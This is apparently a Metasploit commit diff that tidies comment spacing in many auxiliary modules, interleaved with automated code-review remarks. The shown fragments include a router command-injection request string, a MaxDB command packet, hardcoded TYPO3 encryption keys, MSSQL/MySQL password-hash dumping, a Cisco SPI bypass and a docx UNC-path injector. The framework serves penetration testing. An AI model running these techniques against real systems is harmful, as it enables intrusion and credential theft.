yard doc and comment corrections for auxiliary
This commit is contained in:
parent
0dd987d873
commit
4bd40fed7f
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#check to see if we get HTTP OK
|
||||
# check to see if we get HTTP OK
|
||||
if (res.code == 200)
|
||||
print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
|
||||
else
|
||||
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#Check to verify server reported is a 2wire router
|
||||
# Check to verify server reported is a 2wire router
|
||||
if (res.headers['Server'].match(/2wire Gateway/i))
|
||||
print_status("Server is a 2wire Gateway! Grabbing info\n")
|
||||
else
|
||||
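Review bot: `res.headers['Server'].match(/2wire Gateway/i)` raises NoMethodError when the response carries no Server header, so a non-2wire host aborts the module instead of reaching the `else` branch. The nil-tolerant form `if res.headers['Server'] =~ /2wire Gateway/i` (or `.to_s.match(...)`) keeps the intended flow. The enclosing method starts before and ends after this hunk.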
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Hardware Version: #{hardware}")
|
||||
end
|
||||
|
||||
#Check the Software Version
|
||||
# Check the Software Version
|
||||
if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
|
||||
ver = $1
|
||||
print_status("Software version: #{ver}")
|
||||
|
@ -71,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
|
||||
|
||||
cmd = datastore['CMD']
|
||||
#original post request:
|
||||
#data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
|
||||
#action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
|
||||
# original post request:
|
||||
# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&
|
||||
# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="
|
||||
|
||||
vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
|
||||
begin
|
||||
|
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Craig Heffner', #vulnerability discovery and original exploit
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' #metasploit module
|
||||
'Craig Heffner', # vulnerability discovery and original exploit
|
||||
'Michael Messner <devnull[at]s3cur1ty.de>' # metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return false
|
||||
end
|
||||
when 302
|
||||
#Success!
|
||||
# Success!
|
||||
return true
|
||||
else
|
||||
print_error("ERROR: received code #{res.code}")
|
||||
|
@ -100,20 +100,20 @@ class Metasploit4 < Msf::Auxiliary
|
||||
else
|
||||
print_status("Rotating through known encryption keys")
|
||||
encryption_keys = [
|
||||
#TYPO3 4.3.x - 4.4.x
|
||||
# TYPO3 4.3.x - 4.4.x
|
||||
'd696ab49a803d7816021cb1768a6917d',
|
||||
'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
|
||||
'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
|
||||
#TYPO3 4.4.7+
|
||||
# TYPO3 4.4.7+
|
||||
'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
|
||||
#TYPO3 4.5.0
|
||||
# TYPO3 4.5.0
|
||||
'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
|
||||
'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
|
||||
#TYPO3 4.5.2
|
||||
# TYPO3 4.5.2
|
||||
'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
|
||||
#TYPO3 4.5.3
|
||||
# TYPO3 4.5.3
|
||||
'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
|
||||
#TYPO3 4.5.4 - 4.5.7
|
||||
# TYPO3 4.5.4 - 4.5.7
|
||||
'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
|
||||
]
|
||||
end
|
||||
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
connect
|
||||
|
||||
#Grab the MaxDB info.
|
||||
# Grab the MaxDB info.
|
||||
pdbmsrv = "\x5A\x00\x00\x00\x03\x5B\x00\x00\x01\x00\x00\x00\xFF\xFF\xFF\xFF"
|
||||
pdbmsrv << "\x00\x00\x04\x00\x5A\x00\x00\x00\x00\x02\x42\x00\x04\x09\x00\x00"
|
||||
pdbmsrv << "\x00\x40\x00\x00\xD0\x3F\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
|
||||
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status(info)
|
||||
end
|
||||
|
||||
#Send our command.
|
||||
# Send our command.
|
||||
len = 39 + datastore['CMD'].length
|
||||
|
||||
data = len.chr + "\x00\x00\x00\x03\x3F\x00\x00\x01\x00\x00\x00\x54\x0D\x00\x00"
|
||||
|
@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', #Initial discovery, poc
|
||||
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' #Msf module
|
||||
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
|
||||
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
unless length == data.length
|
||||
vprint_warning("#{peer} - Inconsistent length / data packet")
|
||||
#return nil
|
||||
# return nil
|
||||
end
|
||||
|
||||
return { :length => length, :data => data }
|
||||
|
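Review bot: the dead `# return nil` under the length/data mismatch leaves the reader guessing whether returning an inconsistent packet is intentional; the only effect now is the vprint_warning, and callers still receive the hash. Either restore the early return or replace the commented-out line with a comment that states the decision, e.g. `# NOTE: length mismatches are tolerated on purpose; the packet is returned as received`. The enclosing method starts outside this hunk.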
@ -48,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "Version: #{sqlversion}")
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check Configuration Parameters and check what is enabled
|
||||
#---------------------------------------------------------
|
||||
# Check Configuration Parameters and check what is enabled
|
||||
print_status("Configuration Parameters:")
|
||||
if vernum.join != "2000"
|
||||
query = "SELECT name, CAST(value_in_use AS INT) from sys.configurations"
|
||||
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sysconfig[l[0].strip] = l[1].to_i
|
||||
end
|
||||
else
|
||||
#enable advanced options
|
||||
# enable advanced options
|
||||
mssql_query("EXEC sp_configure \'show advanced options\', 1; RECONFIGURE")[:rows]
|
||||
query = "EXECUTE sp_configure"
|
||||
ver = mssql_query(query)[:rows]
|
||||
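Review bot: the `[:rows]` on the `show advanced options` call is discarded, so it adds nothing except a NoMethodError if `mssql_query` ever returns nil; write the line as `mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE")` (the `\'` escapes are no-ops in a double-quoted string, as are the `\(` and `\'\'` escapes in the PWDCOMPARE queries of the `-451` and `-479` hunks). This statement also changes the server's configuration and nothing in the hunk restores it; a comment such as `# side effect: leaves 'show advanced options' enabled on the target` would make that visible to operators. The surrounding `else` branch begins before this hunk.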
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#checking for C2 Audit Mode
|
||||
# checking for C2 Audit Mode
|
||||
if sysconfig['c2 audit mode'] == 1
|
||||
print_status("\tC2 Audit Mode is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if xp_cmdshell is enabled
|
||||
# check if xp_cmdshell is enabled
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['xp_cmdshell'] == 1
|
||||
print_status("\txp_cmdshell is Enabled")
|
||||
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if remote access is enabled
|
||||
# check if remote access is enabled
|
||||
if sysconfig['remote access'] == 1
|
||||
print_status("\tremote access is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if Mail stored procedures are enabled
|
||||
# check if Mail stored procedures are enabled
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Database Mail XPs'] == 1
|
||||
print_status("\tDatabase Mail XPs is Enabled")
|
||||
@ -199,7 +199,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#check if OLE stored procedures are enabled
|
||||
# check if OLE stored procedures are enabled
|
||||
if vernum.join != "2000"
|
||||
if sysconfig['Ole Automation Procedures'] == 1
|
||||
print_status("\tOle Automation Procedures are Enabled")
|
||||
@ -451,7 +451,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check for local accounts with same username as password
|
||||
# Check for local accounts with same username as password
|
||||
sameasuser = []
|
||||
if vernum.join != "2000"
|
||||
sameasuser = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(name, password_hash\) = 1")[:rows]
|
||||
@ -479,7 +479,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check for local accounts with empty password
|
||||
# Check for local accounts with empty password
|
||||
blankpass = []
|
||||
if vernum.join != "2000"
|
||||
blankpass = mssql_query("SELECT name FROM sys.sql_logins WHERE PWDCOMPARE\(\'\', password_hash\) = 1")[:rows]
|
||||
@ -507,7 +507,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Check for dangerous stored procedures
|
||||
# Check for dangerous stored procedures
|
||||
fountsp = []
|
||||
dangeroussp = [
|
||||
'sp_createorphan',
|
||||
@ -732,7 +732,7 @@ EOS
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Enumerate Instances
|
||||
# Enumerate Instances
|
||||
instances =[]
|
||||
if vernum.join != "2000"
|
||||
querykey = "EXEC master..xp_regenumvalues \'HKEY_LOCAL_MACHINE\',\'SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL\'"
|
||||
@ -769,7 +769,7 @@ EOS
|
||||
end
|
||||
|
||||
#---------------------------------------------------------
|
||||
#Enumerate under what accounts the instance services are running under
|
||||
# Enumerate under what accounts the instance services are running under
|
||||
print_status("Default Server Instance SQL Server Service is running under the privilege of:")
|
||||
privdflt = mssql_query("EXEC master..xp_regread \'HKEY_LOCAL_MACHINE\' ,\'SYSTEM\\CurrentControlSet\\Services\\MSSQLSERVER\',\'ObjectName\'")[:rows]
|
||||
if privdflt != nil
|
||||
|
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return nil
|
||||
end
|
||||
|
||||
#Parse results
|
||||
# Parse results
|
||||
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
|
||||
|
||||
if parsed_result && !parsed_result.empty?
|
||||
|
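Review bot: `clue_start` and `clue_end` are interpolated into the regex unescaped, so any metacharacter in them (`.`, `(`, `[`, `?`) changes the pattern or raises RegexpError instead of matching literally. If they are plain strings, use `parsed_result = res.body.scan(/#{Regexp.escape(clue_start)}(.*?)#{Regexp.escape(clue_end)}/m)`; if they are intended as regex fragments, say so in the `# Parse results` comment. Where the two values come from is outside this hunk, as is the start of the method.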
@ -53,12 +53,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def sql_statement()
|
||||
|
||||
#DEFINED HEADER TEXT
|
||||
# DEFINED HEADER TEXT
|
||||
headings = [
|
||||
["Server","Database", "Schema", "Table", "Column", "Data Type", "Sample Data","Row Count"]
|
||||
]
|
||||
|
||||
#DEFINE SEARCH QUERY AS VARIABLE
|
||||
# DEFINE SEARCH QUERY AS VARIABLE
|
||||
sql = "
|
||||
-- CHECK IF VERSION IS COMPATABLE = > than 2000
|
||||
IF (SELECT SUBSTRING(CAST(SERVERPROPERTY('ProductVersion') as VARCHAR), 1,
|
||||
@ -341,11 +341,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
|
||||
#STATUSING
|
||||
# STATUSING
|
||||
print_line(" ")
|
||||
print_status("Attempting to connect to the SQL Server at #{rhost}:#{rport}...")
|
||||
|
||||
#CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
|
||||
# CREATE DATABASE CONNECTION AND SUBMIT QUERY WITH ERROR HANDLING
|
||||
begin
|
||||
result = mssql_query(sql, false) if mssql_login_datastore
|
||||
column_data = result[:rows]
|
||||
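Review bot: `result` stays nil when `mssql_login_datastore` returns false, so `column_data = result[:rows]` raises NoMethodError on the very next line; whether the `rescue` of this `begin` block catches it is outside the hunk, but a failed login should be reported as such rather than surfacing as a nil-receiver error. Check the login first and return with a clear message before issuing the query. The method continues beyond this hunk.
```ruby
begin
  unless mssql_login_datastore
    print_error("Could not log in to the SQL Server at #{rhost}:#{rport}")
    return
  end
  result = mssql_query(sql, false)
  column_data = result[:rows]
  # … unchanged: remainder of the begin block …
```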
@ -355,14 +355,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return
|
||||
end
|
||||
|
||||
#CREATE TABLE TO STORE SQL SERVER DATA LOOT
|
||||
# CREATE TABLE TO STORE SQL SERVER DATA LOOT
|
||||
sql_data_tbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => 'SQL Server Data',
|
||||
'Indent' => 1,
|
||||
'Columns' => ['Server', 'Database', 'Schema', 'Table', 'Column', 'Data Type', 'Sample Data', 'Row Count']
|
||||
)
|
||||
|
||||
#STATUSING
|
||||
# STATUSING
|
||||
print_status("Attempting to retrieve data ...")
|
||||
|
||||
if (column_data.count < 7)
|
||||
@ -386,7 +386,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_line(" ")
|
||||
end
|
||||
|
||||
#SETUP ROW WIDTHS
|
||||
# SETUP ROW WIDTHS
|
||||
widths = [0, 0, 0, 0, 0, 0, 0, 0]
|
||||
(column_data|headings).each { |row|
|
||||
0.upto(7) { |col|
|
||||
@ -394,7 +394,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
}
|
||||
}
|
||||
|
||||
#PRINT HEADERS
|
||||
# PRINT HEADERS
|
||||
buffer1 = ""
|
||||
buffer2 = ""
|
||||
headings.each { |row|
|
||||
@ -406,7 +406,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
buffer2 = buffer2.chomp(",")+ "\n"
|
||||
}
|
||||
|
||||
#PRINT DIVIDERS
|
||||
# PRINT DIVIDERS
|
||||
buffer1 = ""
|
||||
buffer2 = ""
|
||||
headings.each { |row|
|
||||
@ -417,7 +417,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_line(buffer1)
|
||||
}
|
||||
|
||||
#PRINT DATA
|
||||
# PRINT DATA
|
||||
buffer1 = ""
|
||||
buffer2 = ""
|
||||
print_line("")
|
||||
@ -429,7 +429,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_line(buffer1)
|
||||
buffer2 = buffer2.chomp(",")+ "\n"
|
||||
|
||||
#WRITE QUERY OUTPUT TO TEMP REPORT TABLE
|
||||
# WRITE QUERY OUTPUT TO TEMP REPORT TABLE
|
||||
sql_data_tbl << [row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7]]
|
||||
|
||||
buffer1 = ""
|
||||
@ -448,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
)
|
||||
end
|
||||
|
||||
#CONVERT TABLE TO CSV AND WRITE TO FILE
|
||||
# CONVERT TABLE TO CSV AND WRITE TO FILE
|
||||
if (save_loot=="yes")
|
||||
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlserver_query_results.csv"
|
||||
path = store_loot("mssql.data", "text/plain", datastore['RHOST'], sql_data_tbl.to_csv, filename, "SQL Server query results",this_service)
|
||||
|
@ -32,11 +32,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Running MySQL Enumerator...")
|
||||
print_status("Enumerating Parameters")
|
||||
#-------------------------------------------------------
|
||||
#getting all variables
|
||||
# getting all variables
|
||||
vparm = {}
|
||||
res = mysql_query("show variables") || []
|
||||
res.each do |row|
|
||||
#print_status(" | #{row.join(" | ")} |")
|
||||
# print_status(" | #{row.join(" | ")} |")
|
||||
vparm[row[0]] = row[1]
|
||||
end
|
||||
|
||||
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
query = "use mysql"
|
||||
mysql_query(query)
|
||||
|
||||
#Account Enumeration
|
||||
# Account Enumeration
|
||||
# Enumerate all accounts with their password hashes
|
||||
print_status("Enumerating Accounts:")
|
||||
query = "select user, host, password from mysql.user"
|
||||
|
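Review bot: `select user, host, password from mysql.user` assumes the legacy `password` column; on MySQL 5.7 and later that column was replaced by `authentication_string`, if I recall correctly, so the account enumeration fails on current servers and nothing in the hunk handles that error. Consider retrying with `authentication_string` when the first query errors, or choosing the column from the `show variables` output collected into `vparm` in the `-32` hunk (which presumably includes the server version), and document the version dependency in the `# Enumerate all accounts with their password hashes` comment. The enclosing method starts outside the hunk.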
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
print_status("Sending statement: '#{query}'...")
|
||||
result = prepare_exec(query)
|
||||
#Need this if 'cause some statements won't return anything
|
||||
# Need this if statement because some statements won't return anything
|
||||
if result
|
||||
result.each do |line|
|
||||
print_status(line)
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return if not check_dependencies
|
||||
|
||||
begin
|
||||
#Get all values from v$parameter
|
||||
# Get all values from v$parameter
|
||||
query = 'select name,value from v$parameter'
|
||||
vparm = {}
|
||||
params = prepare_exec(query)
|
||||
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
print_status("Running Oracle Enumeration....")
|
||||
|
||||
#Version Check
|
||||
# Version Check
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
print_status("The versions of the Components are:")
|
||||
@ -64,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
)
|
||||
end
|
||||
|
||||
#Saving Major Release Number for other checks
|
||||
# Saving Major Release Number for other checks
|
||||
majorrel = ver[0].scan(/Edition Release (\d*)./)
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Audit Check
|
||||
# Audit Check
|
||||
print_status("Auditing:")
|
||||
begin
|
||||
if vparm["audit_trail"] == "NONE"
|
||||
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Security Settings
|
||||
# Security Settings
|
||||
print_status("Security Settings:")
|
||||
begin
|
||||
|
||||
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Password Policy
|
||||
# Password Policy
|
||||
print_status("Password Policy:")
|
||||
begin
|
||||
query = %Q|
|
||||
|
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
end
|
||||
|
||||
#check if our process is done using these files
|
||||
# check if our process is done using these files
|
||||
def exclusive_access(*files)
|
||||
simple.connect("\\\\#{@ip}\\#{@smbshare}")
|
||||
files.each do |file|
|
||||
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@smbshare = datastore['SMBSHARE']
|
||||
# Try and connect
|
||||
if connect
|
||||
#Try and authenticate with given credentials
|
||||
# Try and authenticate with given credentials
|
||||
begin
|
||||
smb_login
|
||||
rescue StandardError => autherror
|
||||
|
@ -64,10 +64,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n = 0
|
||||
c = 0
|
||||
|
||||
#puts "body is #{res.body.length} bytes"
|
||||
# puts "body is #{res.body.length} bytes"
|
||||
infos = res.body.split(/\r?\n/)
|
||||
infos.each do |row|
|
||||
#puts row.inspect
|
||||
# puts row.inspect
|
||||
if (c < 6)
|
||||
if (row.match(/\["file"\]=>/))
|
||||
c+=1
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
@formats = Set.new
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def run
|
||||
cracker = new_john_cracker
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
print_status "Wordlist file written out to #{wordlist.path}"
|
||||
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
hash_list = hash_file
|
||||
|
||||
#generate our wordlist and close the file handle
|
||||
# generate our wordlist and close the file handle
|
||||
wordlist = wordlist_file
|
||||
wordlist.close
|
||||
|
||||
|
@ -49,29 +49,29 @@ class Metasploit3 < Msf::Auxiliary
|
||||
bnatmac = arp2(bnatip,outint)
|
||||
print_line("Obtained BNAT MAC: #{bnatmac}\n\n")
|
||||
|
||||
#Create Interface Specific Configs
|
||||
# Create Interface Specific Configs
|
||||
outconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{outint}").config
|
||||
inconfig = PacketFu::Config.new(PacketFu::Utils.ifconfig ":#{inint}").config
|
||||
|
||||
#Set Captures for Traffic coming from Outside and from Inside respectively
|
||||
# Set Captures for Traffic coming from Outside and from Inside respectively
|
||||
outpcap = PacketFu::Capture.new( :iface => "#{outint}", :start => true, :filter => "tcp and src #{bnatip}" )
|
||||
print_line("Now listening on #{outint}...")
|
||||
|
||||
inpcap = PacketFu::Capture.new( :iface => "#{inint}", :start => true, :filter => "tcp and src #{clientip} and dst #{serverip}" )
|
||||
print_line("Now listening on #{inint}...\n\n")
|
||||
|
||||
#Start Thread from Outside Processing
|
||||
# Start Thread from Outside Processing
|
||||
fromout = Thread.new do
|
||||
loop do
|
||||
outpcap.stream.each do |pkt|
|
||||
packet = PacketFu::Packet.parse(pkt)
|
||||
|
||||
#Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
# Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
shell_pkt = PacketFu::TCPPacket.new(:config => inconfig, :timeout => 0.1, :flavor => "Windows")
|
||||
shell_pkt.ip_daddr = clientip
|
||||
shell_pkt.recalc
|
||||
|
||||
#Mangle Received Packet and Drop on the Wire
|
||||
# Mangle Received Packet and Drop on the Wire
|
||||
packet.ip_saddr = serverip
|
||||
packet.ip_daddr = clientip
|
||||
packet.eth_saddr = shell_pkt.eth_saddr
|
||||
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#Start Thread from Inside Processing
|
||||
# Start Thread from Inside Processing
|
||||
fromin = Thread.new do
|
||||
loop do
|
||||
inpcap.stream.each do |pkt|
|
||||
@ -98,19 +98,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
packet.eth_daddr = bnatmac
|
||||
end
|
||||
|
||||
#Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
# Build a shell packet that will never hit the wire as a hack to get desired mac's
|
||||
shell_pkt = PacketFu::TCPPacket.new(:config=>outconfig, :timeout=> 0.1, :flavor=>"Windows")
|
||||
shell_pkt.ip_daddr = serverip
|
||||
shell_pkt.recalc
|
||||
|
||||
#Mangle Received Packet and Drop on the Wire
|
||||
# Mangle Received Packet and Drop on the Wire
|
||||
packet.eth_saddr = shell_pkt.eth_saddr
|
||||
packet.ip_saddr=shell_pkt.ip_saddr
|
||||
packet.recalc
|
||||
inj = PacketFu::Inject.new( :iface => "#{outint}", :config =>outconfig )
|
||||
inj.a2w(:array => [packet.to_s])
|
||||
|
||||
#Trigger Cisco SPI Vulnerability by Double-tapping the SYN
|
||||
# Trigger Cisco SPI Vulnerability by Double-tapping the SYN
|
||||
if packet.tcp_flags.syn == 1 && packet.tcp_flags.ack == 0
|
||||
select(nil, nil, nil, 0.75)
|
||||
inj.a2w(:array => [packet.to_s])
|
||||
|
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
|
||||
# here we create an empty .docx file with the UNC path. Only done when FILENAME is empty
|
||||
def make_new_file
|
||||
metadata_file_data = ""
|
||||
metadata_file_data << "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><cp:coreProperties"
|
||||
@ -65,12 +65,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:created><dcterms:modified xsi:type=\"dcterms:W3CDTF\">"
|
||||
metadata_file_data << "2013-01-08T14:14:00Z</dcterms:modified></cp:coreProperties>"
|
||||
|
||||
#where to find the skeleton files required for creating an empty document
|
||||
# where to find the skeleton files required for creating an empty document
|
||||
data_dir = File.join(Msf::Config.data_directory, "exploits", "docx")
|
||||
|
||||
zip_data = {}
|
||||
|
||||
#add skeleton files
|
||||
# add skeleton files
|
||||
vprint_status("Adding skeleton files from #{data_dir}")
|
||||
Dir["#{data_dir}/**/**"].each do |file|
|
||||
if not File.directory?(file)
|
||||
@ -78,19 +78,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
|
||||
#add on-the-fly created documents
|
||||
# add on-the-fly created documents
|
||||
vprint_status("Adding injected files")
|
||||
zip_data["docProps/core.xml"] = metadata_file_data
|
||||
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
|
||||
|
||||
#add the otherwise skipped "hidden" file
|
||||
# add the otherwise skipped "hidden" file
|
||||
file = "#{data_dir}/_rels/.rels"
|
||||
zip_data[file.sub(data_dir,'')] = File.read(file)
|
||||
#and lets create the file
|
||||
# and lets create the file
|
||||
zip_docx(zip_data)
|
||||
end
|
||||
|
||||
#here we inject an UNC path into an existing file, and store the injected file in FILENAME
|
||||
# here we inject an UNC path into an existing file, and store the injected file in FILENAME
|
||||
def manipulate_file
|
||||
ref = "<w:attachedTemplate r:id=\"rId1\"/>"
|
||||
|
||||
@ -99,24 +99,24 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return nil
|
||||
end
|
||||
|
||||
#lets extract our docx and store it in memory
|
||||
# lets extract our docx and store it in memory
|
||||
zip_data = unzip_docx
|
||||
|
||||
#file to check for reference file we need
|
||||
# file to check for reference file we need
|
||||
file_content = zip_data["word/settings.xml"]
|
||||
if file_content.nil?
|
||||
print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.")
|
||||
return nil
|
||||
end
|
||||
|
||||
#if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
|
||||
# if we can find the reference to our inject file, we don't need to add it and can just inject our unc path.
|
||||
if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?
|
||||
vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)")
|
||||
zip_data["word/_rels/settings.xml.rels"] = @rels_file_data
|
||||
# lets zip the end result
|
||||
zip_docx(zip_data)
|
||||
else
|
||||
#now insert the reference to the file that will enable our malicious entry
|
||||
# now insert the reference to the file that will enable our malicious entry
|
||||
insert_one = file_content.index("<w:defaultTabStop")
|
||||
|
||||
if insert_one.nil?
|
||||
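Review bot: `if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil?` is a double negative around a substring test; `if file_content.include?('w:attachedTemplate r:id="rId1"')` says the same thing directly and drops the escaping. The same applies to `if not File.directory?(file)` in the `-65` hunk, which reads better as `next if File.directory?(file)` provided that `if` wraps the whole block body. `manipulate_file` continues past this hunk.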
